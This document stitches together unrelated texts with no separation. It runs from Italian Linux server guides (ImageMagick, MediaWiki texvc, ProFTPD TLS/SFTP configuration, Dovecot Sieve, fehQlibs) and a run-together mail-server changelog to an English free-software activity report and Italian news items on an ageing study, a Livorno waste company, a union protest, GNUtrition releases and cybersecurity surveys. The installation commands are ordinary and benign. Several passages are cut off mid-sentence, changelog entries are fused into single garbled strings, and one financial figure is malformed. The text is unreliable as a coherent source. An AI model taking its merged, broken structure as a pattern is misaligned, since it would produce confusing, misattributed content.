Ghostscript è già incluso in Slackware (ap/ghostscript e ap/ghostscript-fonts-std) ma se siamo in un server minimale potresti avere bisogno di installarlo.
Questa libreria la troviamo all'interno del pacchetto x/fontconfig. E' richesta da ImageMagick.
wget http://www.imagemagick.org/download/ImageMagick-6.7.6-5.tar.bz2
tar xvfj ImageMagick-6.7.6-5.tar.bz2
cd ImageMagick-6.7.6-5
chown -R root:root .
./configure \
--without-x \
--with-png \
--with-freetype \
--with-dps \
--with-gslib
make
make install
ldconfig
Provare a digitare, dalla linea di comando
/usr/local/bin/convert logo: logo.gif
Se viene generato il file PNG tutto funziona come si deve.
wget http://caml.inria.fr/pub/distrib/ocaml-3.12/ocaml-3.12.0.tar.bz2 tar xjf ocaml-3.12.0.tar.bz2 cd ocaml-3.12.0 chown -R root:root . ./configure make make install
Download: http://sourceforge.net/projects/dvipng/
Prerequisiti:
PATH=$PATH:/usr/share/texmf/bin/ export PATH
Ricordare di salvare ciò anche nel profile.
Per evitare problemi nel link di kpathsea configurare come segue
./configure LDFLAGS='-L/usr/share/texmf/lib/' CPPFLAGS='-I/usr/share/texmf/include/' make make install
Senza AMS* alcune formule saranno rese correttamente mentre altre no. Il pacchetto tetex di Slackware contiene già AMS, comunque, nel caso non ce l'avessi:
cd /usr/share/texmf wget ftp://ftp.ams.org/pub/tex/amslatex.zip wget ftp://ftp.ams.org/pub/tex/amsrefs/amsrefs.zip unzip amslatex.zip unzip amsrefs.zip
dovresti trovarlo in /usr/share/texmf/tex/latex/amsmath/amsmath.sty
Cambiare directory dove è installato mediawiki, editare LocalSettings.php e decommentare questo:
$wgUseTeX = true;
cd /path/to/htdocs/mediawiki/math
Prima di compilare, per evitare un parse error, usare il PATH assoluto ovunque all'interno di math/render.ml in questo modo:
let cmd_dvips tmpprefix = "/usr/share/texmf/bin/dvips -q -R -E " ^ tmpprefix ^ ".dvi -f >" ^ tmpprefix ^ ".ps" let cmd_latex tmpprefix = "/usr/share/texmf/bin/latex " ^ tmpprefix ^ ".tex >/dev/null" (* Putting -transparent white in converts arguments will sort-of give you transperancy *) let cmd_convert tmpprefix finalpath = "/usr/local/bin/convert -quality 100 -density 120 " ^ tmpprefix ^ ".ps " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_convert_error" (* Putting -bg Transparent in dvipng's arguments will give full-alpha transparency *) (* Note that IE have problems with such PNGs and need an additional javascript snippet *) (* Putting -bg transparent in dvipng's arguments will give binary transparency *) let cmd_dvipng tmpprefix finalpath backcolor = "/usr/local/bin/dvipng -bg \'" ^ backcolor ^ "\' -gamma 1.5 -D 120 -T tight --strict " ^ tmpprefix ^ ".dvi -o " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_dvipng_error"
Ora compiliamo
make
Provare a mettere dentro una pagina wiki qualcosa come
0
e cerchiamo di vedere cosa succede. Questo è il messaggio di errore più frequente:
Failed to parse (PNG conversion failed; check for correct installation of latex, dvips, gs, and convert)
Controlliamo se gli eseguibili sono nel path:
# ls -lH `which gs` `which latex` `which dvips` `which convert` -rwxr-xr-x 1 root root 5977916 2008-12-05 23:36 /usr/bin/gs* -rwxr-xr-x 1 root root 23410 2010-11-21 15:22 /usr/local/bin/convert* -rwxr-xr-x 1 root root 209308 2007-06-28 04:51 /usr/share/texmf/bin/dvips* -rwxr-xr-x 1 root root 1010984 2007-06-28 04:51 /usr/share/texmf/bin/latex*
Abilitiamo il log degli errori. Inserire una linea come questa in LocalSettings.php
$wgDebugLogFile = "/tmp/wiki.log";
Apriamo questo file e cerchiamo una riga come questa ;
TeX: ./math/texvc '/path/to/htdocs/mediawiki/images/tmp' '/path/to/htdocs/mediawiki/images/tmp' '0' 'UTF-8' 'transparent' TeX output: Ccfcd208495d565ef66e7dff9f98764da0 0 ---
Cerchiamo ora di eseguire il comando texvc dalla linea di comando come utente apache:
cd math sudo -u apache ./texvc '../images/tmp' '../images/tmp' '0' 'UTF-8' 'transparent'
a controlliamo il PNG nella cartella images/tmp. Se si ottiene ancora un parse error, si ricontrolli il path assoluto in math/render.ml, e si ricompili. E si rileggano le referenze indicate.
Ecco come ho installato mod_tls (ftpes) e mod_sftp in proftpd. I miei tentativi di farli convivere in due demoni separati sono tutti falliti, giacchè ho registrato errori nel trasferimento che sono spariti solo quando ho provato a caricare mod_tls o mod_sftp a turno.
Questi i miei test sulla velocità (per la verità un po' frettolosi). ftpes sembra un pochino più veloce in modalità upload:
ftpes
upload: circa 22.4 K/s
download: più di 800 K/s
sftp
upload circa 18.2 K/s
download: più di 800 K/s
./configure \
--prefix=/usr/local \
--without-pam --disable-auth-pam \
--enable-openssl \
--with-modules=mod_ratio:mod_readme:mod_sftp:mod_tls
ftpes.conf# common stuff goes here
Include /usr/local/etc/proftpd/proftpd.conf
<IfModule mod_tls.c>
TLSEngine on
PassivePorts 49152 65535
#MasqueradeAddress 012.345.678.901 # se il server e' dietro un firewall
TLSLog /var/log/proftpd/tls.log
TLSProtocol SSLv23
# Require protection on the control channel, but reject protection of the data channel
TLSRequired ctrl+!data
TLSRSACertificateFile /usr/local/etc/ssl/certs/proftpd.pem
TLSRSACertificateKeyFile /usr/local/etc/ssl/certs/proftpd.pem
TLSVerifyClient off
TLSRenegotiate none
</IfModule>
sftp.conf# common stuff
Include /usr/local/etc/proftpd/proftpd.conf
<IfModule mod_sftp.c>
SFTPEngine on
SFTPLog /var/log/proftpd/sftp.log
Port 22
SFTPHostKey /etc/ssh/ssh_host_rsa_key
SFTPHostKey /etc/ssh/ssh_host_dsa_key
SFTPCompression delayed
MaxLoginAttempts 6
</IfModule>
Infine avviare il demone richiamando il file di configurazione desiderato:
/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf # se si vuole ftpes /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf # se si preferisce sftp
Non avviarli mai insieme.
proftpd.confServerType standalone
UseReverseDNS off
DeferWelcome off
Port 21
Umask 022
MaxInstances 30
User ftp
Group ftp
SystemLog /var/log/proftpd/proftpd.log
TransferLog /var/log/proftpd/xferlog
<Global>
<Directory /*>
AllowOverwrite on
</Directory>
</Global>
<VirtualHost 123.456.789.123>
ServerName "ProFTPD"
DefaultRoot ~/www
DefaultServer on
</VirtualHost>
#!/bin/sh
#
# /etc/rc.d/rc.proftpd
#
start() {
/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf
#-n -d 20 for backup
# /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf
echo "Server started."
}
stop() {
/bin/killall proftpd
echo "Server stopped."
}
restart() {
stop
sleep 3
start
#/bin/killall -HUP proftpd
echo "Server restarted."
}
case "$1" in
'start')
start
;;
'stop')
stop
;;
'restart')
restart
;;
*)
echo "usage $0 start|stop|restart"
esac
Il progetto Pigeonhole fornisce il supporto Sieve a livello di plugin per il Local Delivery Agent (LDA) di Dovecot e anche per suo servizio LMTP. Il plugin è un interprete Sieve che filtra i messaggi in arrivo usando uno script scritto in linguaggio Sieve. Lo script Sieve è fornito dall'utente e, con il suo utilizzo, l'utente può personalizzare come i messaggi in arrivo sono trattati. I messaggi possono essere spediti a una cartella specifica, reindirizzati, rispediti al mittente, scartati, etc.
Il Server Dovecot Managesieve è un servizio per gestire la collezione di script Sieve dell'utente.
Se vuoi supportare i filtri per le email, devi gestire le Sieve rules per mezzo del server dovecot-pigeonhole. Quando crei un filtro con la tua webmail o il tuo client di posta, stai scrivendo uno script in linguaggio Sieve per personalizzare il modo in cui i tuoi messaggi saranno recapitati, vale a dire se saranno inoltrati a qualcun altro, scartati o salvati in delle cartelle particolari. Ma per fare questo Dovecot deve agire anche come un Local Delivery Agent al posto di vpopmail/vdelivermail, ovvero deve essere Dovecot a salvare i messaggi nella tua cartella Maildir. Questa guida cercherà di spiegare come raggiungere questo obiettivo.
spamhaus da connessioni fatte con DNS pubblico.- DKIM: added ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)qmail-dkim error reporting when signing outgoing messages (Andreas Gerstlauer)helodnscheck.cpp: qmail dir determined dinamicallyqmHandle: Add -x and -X parametr for remove email by To/Cc/Bcc (by Stetinac)qmail-spp greylisting plugin to solve a compilation break on rocky 8 (tx Shailendra Shukla)vpopmaild doesn't work when SHA-512 passwords have been enabled on vpopmail (--disable-sha512-passwords). All SQL queries have been updated.libev are now installed in /usr/local/include/libev (was /usr/local/include) to avoid conflicts with libevent (they both have an event.h header file). vusaged configure command was adjusted accordingly.--enable-sqmail-cdbsimscan now defines the maximum size of messages to be passed to spamassassin via control/simsizelimit filevpopmail e nuovo plugin qmailforward per Roundcube che vanno a risolvere diverse problematiche. Maggiori informazioni nella pagina dedicata..Debian, dove python2 non è presente (grazie a Gabriel Torres)convert-multilog program. In case you decide to stick with the original timestamp, then use the original convert-multilog. (diff)ExtractText notes have been revised and corrected by Gabriel Torrescmd_learn and the multi_driver driversqmailadmin: added the ezmlm-idx 7 compatibility patchDKIMKEY=/var/qmail/control/domainkeys/%/default" from the qmail rc config file, as DKIMKEY is actually ignored by dk-filter, which will look for the key in that location by default. Use DKIMSIGN instead to define yor domainkey location (thanks to Steffen for the hint)dovecot: the user query on the auth is now able to manage pop3/imap/webmail vpopmail limits (thanks to Arturo Blanco)vQadmin: combined patch released (more info inside the patch itself)qmail-remote.c that was causing the sending of an additional ehlo greeting (thanks to Cristoph Grover)qmailadmin: added a patch to log auth failures (thanks to Tony)fail2ban: added a filter against qmailadmin log failuresqmailadmin: added a patch to check for the password strenghtextra.h to record the Message-ID in the qmail-send's log (thanks to Simone for the hint). Look here for details.simscan has been improved with the jms patch. The work dir is mounted as a ramdisk nowfail2ban: qmail-smtp.conf filter updated to look for GREETDELAY linesdovecot because of security reasons (more info here)dovecot upgraded to v. 2.2.14dovecot-pigeonhole recompileddovecot upgraded to v. 2.2.14.rc1dovecot-pigeonhole upgraded to v. 0.4.3/usr/local/dovecot/etc/sieve/roundcube upgraded to v. 1.0.3.roundcube-auth filter to fail2banroundcube upgraded to v. 1.0.2. Fixed some errors in the relative page, as sometime the $config variable was still $rcmail_config as in the past, and all the config files are now merged into config.inc.php (thanks to Otto)clamav upgraded to v. 0.98.3roundcube upgraded to v. 1.0.1ezmlm-idx upgraded to v. 7.2.2qmailadmin recompiled against ezmlm-idx-7.2.2ezmlm-idx upgraded to v. 7.2.0ezmlm-idx, getting the program to be compliant with the Yahoo DMARC Policy Change. You have to recompile qmailadmin against ezmlm as well.qmail-maxrcpt patch, which allows you to set a limit on how many recipients are specifiedroundcube upgraded to v. 1.0.0qmail-smtpd-liberal-lf patch, which allows qmail-smtpd to accept messages that are terminated with a single \n instead of the required \r\n sequence. This should avoid some "read failed" reject.dovecot: upgraded to v. 2.1.10dovecot: upgraded to v. 2.1.9dovecot: upgraded to v. 2.1.6qmail-tap added to my combined patchdovecot: upgraded to v. 2.1.1auth_socket_path variable inside 10-mail.confdovecot: upgraded to v. 2.1.0dovecot-pigeonhole: upgraded to v.0.3.0esmtp-size patch added to my combined patchdoublebounce-trim patchRoundcube: updated to v. 0.7.1. All plugins have been updated to latest version as well.dnsbl.sorbs.org is not on my RBL examples anymore, as it proved to be a bad list. It's rejecting gmail's IPs and also confusing the IP of my own server as dynamic.update_tmprsadh to chown the .pem files to vpopmail to avoid hang-ups during the smtp conversation on port 587 caused by permission problems. qmail-remote.c which was not going into tls on authentication (thanks to Krzysztof Gajdemski)force-tls now quits if the starttls command is not provided when required (thanks to Jacekalex)Dovecot: upgraded to v. 2.0.15dovecot-pigeonhole: upgraded to v . 0.2.4RoundCube: upgraded to v. 0.6. All plugins have been updated to latest versionRoundCube: upgraded to v. 0.5.4 (security fix)force-tls patch allows the management of STARTTLS and CRAM-MD5 variables in the run file, so that there's no need to recompile each time anymore.qmail-inject-null-sender" patch by Stéphane Cottin, which addresses a bug on qmail-injectdovecot was updated to allow maildir++ (thanks to Nicolas) on files 90-quota.conf and 20-imap.confqmail on 64b platforms has been fixedrblsmtpd. Added a page about the greetdelay patch.ext-todo and big-todo patches, which adress the "silly qmail syndrome" on big servers.Spamassassin: updated to v. 3.3.2Roundcube: updated to v. 0.5.3 (2 important bug fixes)Dovecot: added a page concerning the purging of expired emails from Trash/JunkRoundCube: updated to v. 0.5.2. Updated almost all roundcube's plugin to latest version.qmail-rblchk---------
Questa pagina concerne il setup di alcuni filtri di rete che aiutano spamassassin a decidere cosa fare di un dato messaggio. Abilitando questi filtri, insieme al sistema di apprendimento bayesiano, migliorerà drasticamente le prestazioni di spamassassin nella lotta allo spamming.
vpopmaild del plugin password è nuovamente funzionante, ora che il problema è stato sistemato dal lato vpopmail (versione 5.6.7 in poi).
Le SURBL sono liste di siti web che appaiono nel corpo della posta indesiderata. Diversamente dalla maggior parte delle liste non sono liste di indirizzi IP.
I siti web che appaiono nei messaggi di posta indesiderata tendono ad essere più stabili rispetto agli indirizzi IP in rapido cambiamento dei botnet che sono soliti inviare la maggior parte di questi messaggi. Le liste di IP come zen.spamhaus.org possono essere usate in un primo stadio di filtraggio per aiutare a identificare da circa l'80% al 90% dei messaggi di posta indesiderata. Le liste SURBL possono contribuire a eliminare il restante 75% della posta indesiderata in un successivo stadio di filtraggio. Usate insieme alle liste di IP (RBL), le SURBL risultano un metodo molto efficace per identificare fino al 95% della posta indesiderata.
fehQlibs-31Le fehQlibs sono librerie C aggiuntive sviluppate da Erwin Hoffmann. Sono un prerequisito di ucspi-tcp6 e di ucspi-ssl.
Installare come segue in /usr/local:
FEQLIBS_VER=31
cd /usr/local
wget https://www.fehcom.de/ipnet/fehQlibs/fehQlibs-${FEQLIBS_VER}.tgz
tar xzf fehQlibs-${FEQLIBS_VER}.tgz
chown -R root:root fehQlibs-${FEQLIBS_VER}
cd fehQlibs-${FEQLIBS_VER}
Cambiare la cartella di installazione modificando il file conf-build come segue
LIBDIR=/usr/local/lib HDRDIR=/usr/local/include
Compilare e installare
make -C src
make -C src shared
make -C src install
cd ..
rm qlibs
ln -s fehQlibs-${FEQLIBS_VER} qlibs
Le qlibs dovranno essere trovate al momento della compilazione di ucspi-tcp6, quindi dobbiamo aggiungerle al file /etc/ld.so.conf:
echo "/usr/local/qlibs" >> /etc/ld.so.conf ldconfig
In genere nei sistemi Unix si può lanciare questo comando per ottenere lo stesso risultato e linkare le librerie qlib:
ldconfig -m /usr/local/qlibs
Su NetBSD ho messo questo nel .profile
export LD_LIBRARY_PATH=/usr/local/qlibs${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
Hello and welcome to my May 2026 free software activities report. A lot's been going on in my life offline so I took a bit of a hiatus from doing these reports, but I've had a fairly productive month of May so I thought it'd be nice to do another one for this month.
ffs package for
GNU Emacs on GNU ELPA. Many thanks to Protesilaos for rounds of
code review and feedback for improving and polishing the package
in preparation for submission to GNU ELPA.Somebody wants you to give them money
error due to the anti-bot challenge being served with a HTTP 402
(Payment Required) response. So I landed a patch 12eec781ed6 to
no longer do that. Thanks to Emacs comaintainer Sean Whitton
for reviewing and approving my proposed patch.<input type="submit">
HTML buttons, <button> elements were not tab-stoppable, leading
to poorer usability and accessibility. So I landed a patch
ec3d662de0b to fix that. Thanks to Emacs comaintainer Eli
Zaretskii for reviewing, providing feedback, and accepting my
proposed change.indicate-buffer-boundaries
and my convenience configuration macros.I've begun the work toward updating the Jami package in Debian unstable again, which means I need to package new releases of its direct and indirect dependencies. For OpenDHT, I need to update RESTinio, and to do that I first need to package expected-lite and sobjectizer for Debian:
I've been working on packaging both and hope to have them uploaded to the archive in the next days and weeks.
That's it for this month's report.
Take care, and so long for now.



Che cosa c’è dietro un’importante affermazione dell’università di Yale sull’invecchiamento? Lo studio di un suo team di scienziati ribalta l’opinione che diventare anziani sia un male: l’avanzare dell’età offre possibilità di miglioramento, perché? Gli studiosi affermano che è proprio il pensiero degli anziani sull’invecchiare a influenzare un processo che fa i conti con la salute ma ha anche delle potenzialità. Quindi, sono mentalità e pregiudizi che possono incidere sulla qualità della vita dopo gli anta.
L’autrice dello studio, Becca R. Levy, docente di scienze sociali e comportamentali, ha analizzato i dati di uno studio decennale sugli anziani americani a livello nazionale. La scoperta all’interno del dipartimento di salute della Yale School è che la metà degli adulti di età pari o sopra i 65 anni ha mostrato un miglioramento cognitivo ma anche fisico nel tempo.
In tarda età, molte fatiche della vita come il lavorare, portare pesi e altro vengono limitate. Si tende a faticare meno o a disincentivare il lavoro più pesante. Mente e fisico sicuramente devono affrontare primi problemi di salute. Però, non è una costante e molti anziani, che hanno più tempo libero, possono usufruirne per migliorarsi e migliorare anche le condizioni fisiche.
L’analisi di Becca Levy non ha scoperto miglioramenti in piccoli gruppi eccezionali ma in soggetti collegati o accomunati da diversi fattori importanti. Tra questi, anche il non vedere l’invecchiamento per forza come un ostacolo o un decadimento. I risultati sono stati pubblicati sulla rivista Geriatrics e contengono diverse informazioni.
L’Health and Retirement Study è l’indagine longitudinale sugli anziani americani, finanziata a livello federale. Coinvolse 11.000 partecipanti ed è lo studio utilizzato per trarre i dati sulla nuova filosofia dell’invecchiamento. I cambiamenti cognitivi furono valutati considerando funzionalità fisiche come camminata veloce e altre attività. In un follow-up di 12 anni, il 45% dei partecipanti ha registrato miglioramenti in due ambiti di vita. Il 32% ha registrato miglioramenti cognitivi, il 28% miglioramenti fisici.
Queste percentuali non dicono che non ci siano deterioramenti fisici e cognitivi, come dice lo studio stesso: “Se si fa la media di tutti, si nota un declino. Ma quando si considerano le traiettorie individuali, si scopre una storia molto diversa. Una percentuale significativa dei partecipanti più anziani che abbiamo studiato è migliorata“.
Uno studio di Yale scopre cambiamenti positivi negli adulti dai 65 anni in su è stato pubblicato per la prima volta su Lega Nerd. L’utilizzo dei testi contenuti su Lega Nerd è soggetto alla licenza Creative Commons Attribuzione-Non commerciale-Non opere derivate 2.5 Italia License. Altri articoli dello stesso autore: Daniela Giannace
Scavando nei meandri dei nostri archivi abbiamo ripescato questa fantastica produzione di ZeroCalcare per sostenere A/I. Ve la rigiriamo a distanza di più di 20 anni, ricordandovi che potete sostenerci in tanti modi, compreso il 5×1000!
PS: rimanete sintonizzati perché all’hackmeeting tornano… LE MAGLIETTE (e le spillette pure, clamoroso!)!
A test release of GNUtrition, 0.33.0rc4, is now available.
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release improves how user ages are stored and used by GNUtrition. You no longer need to manually update your age every year on (or near) your birthday. Thankfully, no database changes/migrations are necessary for this, you just need to enter your birthday and you will be good to go!
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

Ratificando un utile di 252.000 € l’Assemblea dei Soci di AAMPS ha approvato nei giorni scorsi il bilancio aziendale 2025. Un risultato in linea con quanto registrato negli anni precedenti, comprendendo anche quelli relativi all’uscita anticipata dal concordato preventivo in continuità, con i bilanci che avevano ottenuto analoghi risultati (965.202€ nel 2019, 2.2912.441€ nel 2020, 515.035€ nel 2021, 94.835€ nel 2022, 131.270€ nel 2023 e 145.704 € nel 2024).
La notizia era stata anticipata nei giorni scorsi durante una conferenza stampa dedicata ai bilanci di tutte le aziende partecipate del Comune di Livorno, ma il Sindaco di Livorno Luca Salvetti, affiancato dall’Amministratore Unico Aldo Iacomelli e dalle assessore Viola Ferroni e Giovanna Cepparello, ha tenuto ad aprire un faro su AAMPS/Retiambiente.
“Sono orgoglioso di questa azienda, dei servizi che eroga e di tutti i suoi lavoratori. Nel 2019 abbiamo trovato AAMPS in concordato preventivo, con un futuro a dir poco incerto e il rischio concreto di vederla soccombere sotto il peso di conti sballati e servizi alla cittadinanza inadeguati. Ora registriamo l’ennesimo bilancio in utile consecutivo, con il personale incrementato e stabilizzato e prospettive di consolidamento e sviluppo prima impensabili. In tale percorso siamo riusciti a traghettarla in RetiAmbiente consolidandone la vocazione industriale e riuscendo a contenere la TARI senza aumentarla per cinque anni e allineandola agli importi degli altri capoluoghi di provincia della Toscana. Sono i fatti che ci permettono di respingere al mittente le accuse sollevate recentemente da alcuni esponenti dell’opposizione in consiglio comunale ammantate di macroscopiche inesattezze e castronerie indecifrabili sia riconducibili all’azienda sia alla sua holding”.
“AAMPS ha fatto un incontrovertibile cambio di passo tornando ad essere un’azienda in salute con un ruolo di primo piano sia nell’erogazione dei servizi alla cittadinanza sia tra le società operative locali dell’Ato Toscana Costa che compongono la galassia Retiambiente e dove l’azienda riveste un ruolo di primo piano assoluto. Il cammino è stato impervio con ostacoli che sembravano insormontabili. Oggi siamo invece nella possibilità di guardare al futuro con grande ottimismo e rinnovate prospettive di consolidamento sia sul versante economico-finanziario sia su quello dello sviluppo industriale”.
“I numeri sono dalla nostra parte e ci dicono che AAMPS può cogliere risultati importanti inerenti la vocazione ambientale che è chiamata a rappresentare ed esprimere. Nonostante mesi di particolare difficoltà, dovuti a contingenze operative affrontate con impegno e sacrificio da parte di tutti, oggi l’azienda può guardare in avanti con rinnovato entusiasmo e approssimarsi ad innovare e introdurre importanti cambiamenti nella gestione dei rifiuti a livello locale in linea con le strategie condivise con le altre SOL del gruppo Retiambiente. Chiederemo ai cittadini la consueta collaborazione con l’obiettivo di aumentare le percentuali di raccolta differenziata, conferendo materiali di maggiore qualità, e allo stesso tempo continuare a diminuire la produzione dei rifiuti nelle rispettive abitazioni”.
AAMPS è un fiore all’occhiello di Livorno. Una società interamente pubblica che eroga servizi ambientali a favore della città fin dal 1949 con grande efficacia ed efficienza impegnando 421 lavoratori in moto perpetuo nella raccolta dei rifiuti, nella pulizia delle strade e nei servizi cimiteriali e commerciali. Tutto questo con i conti sotto controllo suffragati anche dall’assenza di debiti e avendo comunque effettuato importanti investimenti, attingendo a finanziamenti dedicati, senza fare ricorso al credito bancario. Il tutto nella massima trasparenza richiesta ad una società in house providing in affiancamento alla sua holding con la quale condividere strategie industriali ben ponderate”.
L'articolo AAMPS/Retiambiente: ancora un bilancio in utile proviene da Aamps Livorno.
In vista della festività di martedì 2 giugno AAMPS/Retiambiente conferma che il servizio di raccolta dei rifiuti si svolgerà regolarmente. Sono previsti solo alcuni cambiamenti negli itinerari di interesse per gli abitanti delle aree Livorno Est e Picchianti-Porta a Terra.
Ecco il dettaglio suddiviso per Aree valido per la raccolta nel giorno della Festa della Repubblica:
Area Livorno Nord
Indifferenziato: servizio attivo con esposizione del materiale dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta.
Area Sant’Jacopo Marradi
Il calendario ordinario non prevede il servizio di raccolta il lunedì.
Area Vittoria Stazione Zola
Carta-cartone: servizio attivo con esposizione del materiale dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta.
Area Livorno est
Organico: servizio anticipato alla mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta).
Area Picchianti – Porta a Terra
Organico: servizio anticipato alla mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta).
Area Ardenza – La Rosa
Organico: servizio attivo la mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta).
Livorno Sud
Carta-cartone: servizio attivo con esposizione del materiale dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta.
Pentagono
Multimateriale: servizio attivo con esposizione del materiale dalle ore 19.30 alle 20.00 del giorno di raccolta.
Aree Pentagono e Centro Allargato
Tutti i contenitori stradali presenti nelle aree “Pentagono” e “Centro Allargato” saranno regolarmente vuotati. Il Centro di raccolta “Livorno Sud” e il “Centro del riuso creativo” saranno chiusi martedì e riapriranno il giorno seguente. Servizio di raccolta pannolini/pannoloni: non effettuato nei giorni festivi.
Ringraziamo i cittadini per la consueta collaborazione. Per ulteriori informazioni: 800-031.266, info@aamps.livorno.it, facebook/instagram/APP (“AAMPS Livorno”).
L'articolo Rifiuti: quali servizi nella festività del 2 giugno proviene da Aamps Livorno.
L’Unione Sindacale di Base aderisce e partecipa alla manifestazione “No Base” del 2 giugno a Pontedera, una mobilitazione necessaria contro la militarizzazione dei territori, contro l’economia di guerra e contro le politiche imperialiste portate avanti dal governo italiano, dall’Unione Europea e dagli Stati Uniti.
Da anni USB è impegnata nelle lotte contro la guerra, contro il riarmo e contro l’utilizzo dei porti, delle infrastrutture logistiche e dei territori come strumenti della macchina bellica. Lo abbiamo fatto organizzando scioperi, presidi e mobilitazioni nei porti italiani contro il traffico di armi e contro il coinvolgimento dell’Italia nei conflitti imperialisti.
Abbiamo sostenuto e promosso mobilitazioni internazionali dei lavoratori portuali contro il traffico di armi e contro il genocidio del popolo palestinese, ribadendo che i porti non devono essere al servizio della guerra e della morte.
Oggi più che mai è evidente il legame tra militarizzazione dell’economia, attacco ai diritti sociali e peggioramento delle condizioni materiali delle lavoratrici e dei lavoratori. Mentre miliardi vengono destinati alle spese militari, ai programmi di riarmo e alla Nato, salari, pensioni, sanità, scuola e servizi pubblici vengono sacrificati sull’altare della guerra e del profitto.
Per questo diciamo con forza:
GIÙ LE ARMI, SU I SALARI
La costruzione di nuove basi militari, l’espansione delle servitù militari e la subordinazione dei territori agli interessi strategici della Nato rappresentano un attacco diretto alle esigenze sociali delle classi popolari. Le lavoratrici e i lavoratori non possono pagare il prezzo della guerra, del carovita e delle politiche imperialiste.
USB denuncia il genocidio in Palestina e la complicità del governo italiano, dell’Unione Europea e degli Stati Uniti nel sostegno politico, economico e militare a Israele. Allo stesso tempo respingiamo le aggressioni economiche, politiche e militari contro i popoli che resistono all’ordine imperialista, dall’attacco permanente contro Cuba e Venezuela e l’attacco all’Iran.
La guerra esterna si accompagna sempre alla guerra interna contro il lavoro, contro il conflitto sociale e contro il diritto di sciopero. La militarizzazione produce repressione, precarietà e impoverimento, mentre grandi gruppi industriali e finanziari aumentano i propri profitti grazie all’economia di guerra.
Per queste ragioni saremo in piazza il 2 giugno a Pontedera insieme ai movimenti territoriali, alle realtà sociali e a tutte e tutti coloro che si oppongono alla guerra, all’imperialismo e alla militarizzazione dei territori.
NO ALLA BASE MILITARE
NO ALL’ECONOMIA DI GUERRA
NO ALL’IMPERIALISMO
STOP AL GENOCIDIO IN PALESTINA
GIÙ LE ARMI, SU I SALARI

A test release of GNUtrition, 0.33.0rc3, is now available.
GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release removes a number of dependencies that broke building/installing on various systems. You no longer need to have a full LibreOffice, ncurses, SQLite, or LaTeX/TexInfo install to build and install GNUtrition.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

A leggere il nuovo “2026 Cloud Security Report” realizzato da Check Point insieme a Cybersecurity Insiders, sembra proprio che l’adozione dell’intelligenza artificiale nelle aziende stia crescendo più rapidamente della capacità delle organizzazioni di proteggerla. Il report, basato sulle risposte di 1.042 professionisti IT e cybersecurity provenienti da organizzazioni di tutto il mondo, mostra un quadro […]
L'articolo Il 78% delle aziende ha già subito o sospetta incidenti legati all’IA proviene da Securityinfo.it.


Immagine in evidenza rielaborata con intelligenza artificiale (ChatGPT)
L’applicazione dell’intelligenza artificiale nella cybersicurezza genera, da sempre, sentimenti contrastanti. Le potenzialità dell’AI rappresentano, da una parte, un’opportunità per migliorare il livello di automazione nelle attività di rilevamento e risposta agli attacchi dei criminali informatici. L’altra faccia della medaglia è rappresentata dalla possibilità che gli stessi cybercriminali ne sfruttino le capacità per aumentare l’efficacia degli attacchi.
È qualcosa che sta già accadendo e che viene messo nero su bianco, per esempio, nel Global Threat Report 2026 di CrowdStrike. Stando ai dati pubblicati dalla società di cybersecurity, gli attacchi portati utilizzando l’AI sarebbero aumentati dell’89% anno su anno.
Ma l’impatto dell’AI non si esaurisce negli attacchi veri e propri. La stessa tecnologia che li accelera sta mettendo sotto pressione, in particolare, l’ecosistema che fino a oggi ha garantito l’attività di identificazione e analisi delle vulnerabilità software. In altre parole, l’AI sta rompendo gli equilibri che per anni hanno permesso di mitigare il rischio di attacchi informatici.
Per comprendere l’impatto dell’AI in questo particolarissimo settore è indispensabile comprenderne i meccanismi. La vulnerability discovery è infatti una macchina complicata, in cui si intrecciano interessi diversi e convivono varie contraddizioni.
Il concetto alla base del sistema è quello di individuare eventuali falle di sicurezza di software e sistemi operativi prima che questi vengano scovati dai cyber criminali. Un’attività che vede impegnate centinaia (migliaia) di aziende e ricercatori indipendenti, spesso all’interno dei cosiddetti programmi di bug bounty, cioè processi controllati attraverso i quali gli sviluppatori ricompensano economicamente chi segnala una nuova vulnerabilità potenzialmente pericolosa, permettendo loro di correggerla attraverso patch di aggiornamento.
L’importanza del fattore tempo emerge proprio nella fase finale del processo di responsible disclosure, quando vengono rilasciati l’aggiornamento e i dettagli della vulnerabilità. È in questo momento che si apre una finestra temporale particolarmente delicata: quella in cui un cybercriminale può sfruttare la vulnerabilità creando un exploit (la tecnica che permette di portare un attacco) in grado di “bucare” i sistemi non aggiornati.
